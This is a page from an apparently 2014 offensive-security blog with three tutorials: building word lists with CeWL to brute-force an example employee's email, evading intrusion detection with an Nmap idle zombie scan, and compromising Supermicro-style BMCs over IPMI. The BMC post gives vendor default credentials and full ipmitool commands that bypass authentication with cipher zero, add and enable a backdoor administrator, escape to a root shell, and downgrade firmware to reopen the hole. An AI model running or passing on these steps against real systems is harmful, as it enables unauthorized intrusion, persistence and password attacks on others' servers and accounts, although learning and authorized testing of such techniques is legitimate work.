Monday, November 10, 2014

Fun with CeWL and word list mutation



For those of you who aren't aware, CeWL is a utility that can assist in creating unique custom word lists by spidering web pages. CeWL is a ruby application that will spider a given URL to a specified depth collecting words and even email addresses. The returned word list can be used with programs such as John The Ripper or any other application capable of word list based brute force attacks. CeWL comes prepackaged on BackTrack and Kali Linux installations, however if you are wanting to set it up on a different Linux distribution, you can find the download information at the following website:

Baisc Syntax:

The basic syntax of CeWL is very straightforward, take for example the following:
# cewl --depth 7 --min_word_length 5 -write new_wordlist.lst --email --email_file found_emails.lst --verbose <TARGET URL>

Lets examine this command in more detail...

depth – this flag specifies the depth of how far CeWL is going to go
min_word_length – this flag specifies the minimum word length that CeWL will collect
write – this flag specifies the name of the word list CeWL will generate
email – this flag tells CeWL that we would like to collect emails
email_file – this flag specifies the name of the file CeWL will dump emails into
verbose – verbose output to STDOUT
<TARGET URL> – the URL we are telling CeWL to spider

If we ran this on a target URL, we would obtain two output files, one containing potentially useful emails and one containing a bunch of words that were scraped from the target URL. The generated word list is relatively useless as is, however, we can increase the chances of finding a valid credential by mutating the word list.

Mutating Word Lists:

By mutating a word or lists of words, we can permulate different variations of possibles that will aid in a brute force attack. Take for example, the following scenario. We are targeting a company and have managed to come across a list of employees. We decide that we want to attempt to gain access into bob.banter@targetcompany.com 's company email account. After digging into Bob Banter's background, we have found that he was born in Hawaii in 1976. From this we could derive a possible password of “aloha1976”. The chances of this being a valid password for his email are slim. However, chances increase when we mutate this possible password. By mutating the password, we could get a list of mutations that could contain the actual password, ie: @!0ha_1976.

There are numerous scripts and utilities we can use to mutate word lists in different ways. I am going to share a custom little program that I came across in some of my research that mutates words into different variants of l33t speak. Once you compile it, mutating a word list is as simple as piping input into the program and redirecting output into a file.

Example:
# cat wordlist.lst | ./l33tmutate > mutated.lst

You can clone the mutation script from the following link
https://github.com/securityvoodoo/LeetMutation.git
Posted by at No comments:

Monday, August 4, 2014

NIDS Evasion



Network Intrusion Detection Systems are pretty darn good at what they do. So why avoid detection when we can just point the finger at some other poor soul? Nmap provides a fantastic method for blindly scanning a target utilizing an idle host. Thereby enabling us to execute a scan without directly sending packets from our IP address. Instead we will bounce packets off a “zombie” host.

Zombie Host Selection

In order for this scan to work we need to utilize a “zombie” host. A zombie host is considered any system that is currently idle (ie: not doing any network related functions). This is important as we must be able to predict the IP-IDs of the system in order to determine open ports on the target. Luckily Metasploit steps in to make our lives easier with their ipidseq module. This module can be configured to run over large IP address blocks and report on all idle host candidates.

msf auxiliary(ipidseq) > set RHOSTS 192.168.122.0/24
RHOSTS => 192.168.122.0/24
msf auxiliary(ipidseq) > run

[*] 192.168.122.1's IPID sequence class: All zeros
[*] Scanned 026 of 256 hosts (010% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 077 of 256 hosts (030% complete)
[*] 192.168.122.78's IPID sequence class: All zeros
[*] Scanned 103 of 256 hosts (040% complete)
[*] Scanned 128 of 256 hosts (050% complete)
[*] Scanned 154 of 256 hosts (060% complete)
[*] 192.168.122.172's IPID sequence class: All zeros
[*] Scanned 180 of 256 hosts (070% complete)
[*] 192.168.122.189's IPID sequence class: Incremental!
[*] Scanned 205 of 256 hosts (080% complete)
[*] Scanned 231 of 256 hosts (090% complete)
[*] 192.168.122.239's IPID sequence class: Incremental!
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

From the above ipidseq scan you can see that we have two zombies to choose from. We are going to select 192.168.122.189 as our zombie. We can now use this idle host in our nmap scan. Denoting our target as xx.xx.xx.xx, the syntax of the command will look similar to the following:

# nmap -Pn -p- -sI 192.168.122.189 xx.xx.xx.xx

Diagrams

Below are some diagrams depicting how the TCP idle scan determines open ports.

 
We can see here that during the TCP idle scan, the attacker will first send a SYN/ACK to the zombie.  The zombie host, not expecting a SYN/ACK, will respond with an RST packet disclosing it's IP-ID.  This number is important and will be used later.




 

In the next phase of the scan, the attacker will spoof the header of the SYN packet to appear that it came from the zombie host and send it to the target.

As we can see from the diagram, the SYN packet causes the target to send a SYN/ACK to the zombie.  In response to the unexpected SYN/ACK, the zombie will respond with a RST.








The attacker will once again probe the zombie with a SYN/ACK in order to obtain it's new IP-ID.  It is the comparison of the two IP-IDs that will determine if the port is open or closed.



As you can see, the IP-ID has increased by 2 indicating an open port.  An increase of 1 would indicate a closed port as the target would have sent a RST which the zombie would not have responded to thus it's IP-ID would not have been incremented.




Posted by at No comments:

Saturday, August 2, 2014

Exploiting Supermicro and other BCM Embedded Systems


BCMs and Governing Protocol

Baseboard management controllers (BMCs) are a class of embedded computers used to provide monitoring for servers and workstations. They are generally implemented in embedded ARM systems and connected to the south bridge of the host system's motherboard. Network access is achieved either via dedicated interface or sideband onto an existing interface. Almost all workstations and servers come with some sort of support for BMCs which can also be bought as a PCI expansion or pluggable module.
IPMI, which is short for “Intelligent Platform Management Interface,” is the collection of protocols that govern communications across the local system bus as well as the network. IPMI's current default port is 623, however boxes running IPMI can also be detected if port 49152 is open. And to all those who haven't checked yet, Metasploit has numerous modules to aid in the detection and exploitation of IPMI. Of course you don't need to utilize these modules to hack this gibson. Exploiting these things manually gives one a better understanding of how all this works. Don't get me wrong, Metasploit is a great tool and definitely has it's purposes. However, it can become a hindrance when used as a solution in a learning environment. Below I introduce the first, and admittedly obvious, method of exploiting this service.

Guessing Passwords

Like the common household wireless router, default passwords are not often changed on these boxes. This means one can use the convenient chart below to guess passwords once you have identified a target.

Module
Default User-name
Default Password
Dell DRAC / iDRAC
root
Calvin
IBM IMM
USERID
PASSW0RD
Supermicro IPMI
ADMIN
ADMIN
Fujitsu
admin
admin
Oracle ILOM
root
changeme
Asus iKVM
admin
admin

I purposely left out the HP iLO, since HP was smart enough to realize that lazy sys-admins are most likely going to forget or just not care enough to actually change the default password, so they set it to a randomized 8-character string which would mitigate some of the problems, if not Cypher-suite Zero.

Cypher-suite Zero

Of course Metasploit has a module for this, but we are going to go ahead and ignore that because it completely defeats the purpose of learning. With IPMI 2.0 came cryptography, as well as a way to completely bypass authentication. Cypher-suite Zero allows any user on the system to completely bypass authentication. This does require having knowledge of a valid user account on the system, which is no problem considering we have a bunch of default accounts to try. To pull off this hack we will use a cli tool called ipmitool.

To get a feel for the syntax, below is an example ipmitool command that uses Cypher-suite Zero to get a list of users on the system.

# ipmitool -I lanplus -C 0 -H 192.168.207.116 -U ADMIN -P fakepass user list

Lets pick this command apart to see what it is doing:

  • -I lanplus → this flag will specify we want to use IPMI version 2.0
  • -C 0 → this flag specifies that we are using Cypher-suite Zero
  • -H xx.xx.xx.xx → this flag specifies the target host
  • -U → self explanatory, this flag specifies the username
  • -P → self explanatory, this flag specifies the password (Fake password in this case).
  • user list → this is the command that will be executed to list the current users on the host.

Now that we have extracted a list of users from the target, lets see if we can add a new user to the system. We will accomplish this with the following command:

# ipmitool -I lanplus -C 0 -H 192.168.207.116 -U ADMIN -P fakepass user set name 9 voodoo
# ipmitool -I lanplus -C 0 -H 192.168.207.116 -U ADMIN -P fakepass user set password 9 s3cU17y

In the above command-line, we use the command “user set” to set a user with UID of 9 and name of voodoo. It is worth mentioning that the UID must be unique per user. I chose 9 arbitrarily as an example. But since there were only two accounts on the system I could have used a UID of 3. We then used the “user set password” command to set the password on our new user identified by the UID 9.

Can I Haz Admin?

Now that we have added a user, the next logical step is to see if we can give that user any privileges. Fortunately, there is a command for that which reads:

# ipmitool -I lanplus -C 0 -H 192.168.207.116 -U ADMIN -P fakepass user priv 9 4
# ipmitool -I lanplus -C 0 -H 192.168.207.116 -U ADMIN -P fakepass user enable 9

As you can see, we have leveraged our access to set privileges to 4 (i.e., Administrator), and then enabled our account.  But hey this doesn't really do anything, all we have access to is a dumb web UI and a few simple commands. Not quite. Recall that BMCs generally offer a web management UI as well as an SSH tunnel for management. If we try to ssh into the server using our newly created user account, you will find that you now have a shell on the BMC.

[voodoo@spaceghost]# ssh voodoo@192.168.207.116
The authenticity of host '192.168.207.116 (192.168.207.116)' can't be established.
RSA key fingerprint is 21:0e:54:f2:0c:d8:bc:a1:1c:72:e0:3b:e9:ae:f9:82.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.207.116' (RSA) to the list of known hosts.
voodoo@192.168.207.116's password:

ATEN SMASH-CLP System Management Shell, version 1.02
Copyright (c) 2008-2009 by ATEN International CO., Ltd.
All Rights Reserved

Digging further

While we still have yet to cover all the methods one can use to back-door a BMC module, we will move forward and discuss methods further exploit a compromised BMC. Let's assume we have already identified a target running IPMI, exploited the BMC using Cypher-suite Zero, and have given ourselves a nice little back-door. What now? Where do we go from here? The current SMASH shell appears to be rather restricted and doesn't give us the flexibility we want. There are a few different methods we can use to get a better foothold on system the first of which being a hidden function of the BMC firmware.

As it turns out, in certain firmware versions, you can call “shell” from the current SMASH shell, which will allow for code execution on the remote machine. An example of this would be appending the command you want to execute on the end of the call to “shell”. For example, “shell pwd” would display the current working directory. Taking this a step further we can leverage this functionality to gain a root shell on the box by simply issuing the following command:

# shell sh

The above command escapes the SMASH shell and drops us into a root shell on the embedded system.  If the firmware version has been updated on the BMC, escaping into a root shell via the above command will not work. However we do still have God powers on the BMC, so in this scenario, we can flash outdated firmware to the BMC and exploit the system through the same escape method. If all this seems just too easy, just wait because it gets even easier. We can also gain remote code execution through buffer overflow exploits due to poorly written code. I refer to CVE-2013-3621, CVE-2013-3623, and CVE-2013-3622 all of which are known exploits in the code for CGI applications available through the web interface. CVE-2013-3623 in particular refers to two buffer overflow vulnerabilities in close_window.cgi. Metasploit has an exploit that takes advantage of this CVE through which we can get a root shell on the system.



References:





Posted by at No comments:
Subscribe to: Posts (Atom)